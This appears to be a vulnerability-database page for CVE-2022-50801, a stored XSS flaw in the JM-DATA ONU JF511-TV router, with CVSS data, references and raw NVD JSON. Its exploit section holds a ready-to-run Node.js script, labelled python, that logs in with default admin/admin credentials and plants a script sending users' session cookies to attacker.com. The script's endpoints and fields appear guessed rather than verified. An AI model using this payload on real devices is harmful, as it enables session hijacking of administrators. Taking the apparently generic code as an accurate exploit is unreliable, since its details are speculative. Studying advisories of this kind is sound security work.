CVE-2022-50801

Description

JM-DATA ONU JF511-TV version 1.0.67 is vulnerable to authenticated stored cross-site scripting (XSS) attacks, allowing attackers with authenticated access to inject malicious scripts that will be executed in other users' browsers when they view the affected content.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

JM-DATA ONU JF511-TV < 1.0.67

JM-DATA ONU JF511-TV version 1.0.67

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2022-50801 PoC - Stored XSS in JM-DATA ONU JF511-TV
// Authenticated Stored XSS Payload

const axios = require('axios');

// Configuration
const TARGET = 'http://192.168.1.1'; // Device IP
const USERNAME = 'admin';
const PASSWORD = 'admin';

// XSS Payload - Steal session cookies
const xssPayload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>';

// Login and exploit
async function exploit() {
  try {
    // Step 1: Login to get authenticated session
    const loginResp = await axios.post(`${TARGET}/login`, {
      username: USERNAME,
      password: PASSWORD
    });
    const cookies = loginResp.headers['set-cookie'];
    
    // Step 2: Inject XSS payload into vulnerable parameter
    // Common vulnerable fields: device_name, description, custom_dns, etc.
    await axios.post(`${TARGET}/api/device/config`, {
      device_name: xssPayload,
      description: 'JM-DATA ONU JF511-TV',
      version: '1.0.67'
    }, {
      headers: { Cookie: cookies }
    });
    
    console.log('[+] XSS payload injected successfully');
    console.log('[+] Payload will execute when admin views device info');
  } catch (err) {
    console.error('[-] Exploitation failed:', err.message);
  }
}

exploit();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50801
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50801
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50801/
[4] VulDB https://vuldb.com/cve/CVE-2022-50801
[5] https://cxsecurity.com/issue/WLB-2022060058
[6] https://exchange.xforce.ibmcloud.com/vulnerabilities/229343
[7] https://packetstormsecurity.com/files/167487/
[8] https://www.jm-data.com/
[9] https://www.vulncheck.com/advisories/jm-data-onu-jf-tv-authenticated-stored-cross-site-scripting-xss-vulnerability
[10] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50801", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:47.470", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "JM-DATA ONU JF511-TV version 1.0.67 is vulnerable to authenticated stored cross-site scripting (XSS) attacks, allowing attackers with authenticated access to inject malicious scripts that will be executed in other users' browsers when they view the affected content."}, {"lang": "es", "value": "JM-DATA ONU JF511-TV versión 1.0.67 es vulnerable a ataques de cross-site scripting (XSS) almacenado autenticado, lo que permite a los atacantes con acceso autenticado inyectar scripts maliciosos que se ejecutarán en los navegadores de otros usuarios cuando visualicen el contenido afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2022060058", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/229343", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/167487/", "source": "[email protected]"}, {"url": "https://www.jm-data.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/jm-data-onu-jf-tv-authenticated-stored-cross-site-scripting-xss-vulnerability", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php", "source": "[email protected]"}]}}